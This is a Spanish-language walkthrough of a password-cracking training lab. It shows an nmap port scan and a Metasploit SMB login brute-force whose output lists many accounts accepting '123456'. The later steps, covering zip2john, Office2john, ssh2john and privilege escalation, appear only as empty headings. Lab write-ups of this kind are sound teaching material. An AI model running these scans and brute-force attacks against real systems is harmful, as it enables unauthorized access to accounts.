🔑Lab de contraseñas - Medium
Nuestro próximo host es una estación de trabajo utilizada por un empleado para su trabajo diario.
Objetivo
Escaneo de puertos
sudo nmap -v -sV -T5 10.129.202.221 -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelBruteforce de SMB
msf6 auxiliary(scanner/smb/smb_login) > set user_file username.list
user_file => username.list
msf6 auxiliary(scanner/smb/smb_login) > set pass_file password.list
pass_file => password.list
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 10.129.187.207
rhosts => 10.129.187.207
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 10.129.187.207:445 - 10.129.187.207:445 - Starting SMB login bruteforce
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\john:123456'
[!] 10.129.187.207:445 - No active DB -- Credential data will not be saved!
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\dennis:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\chris:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\cassie:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\admin:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\root:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\sysadmin:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\sysadm:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\svc:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\administrator:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\helpdesk:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\reception:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\finance:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\its:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\ict:123456'
[+] 10.129.187.207:445 - 10.129.187.207:445 - Success: '.\hr:123456'Enumeración de SMB
Cracking con zip2john

Cracking con Office2john


Root Login
Escalada de privilegios
Cracking con ssh2john
Acceso Root - Final
Última actualización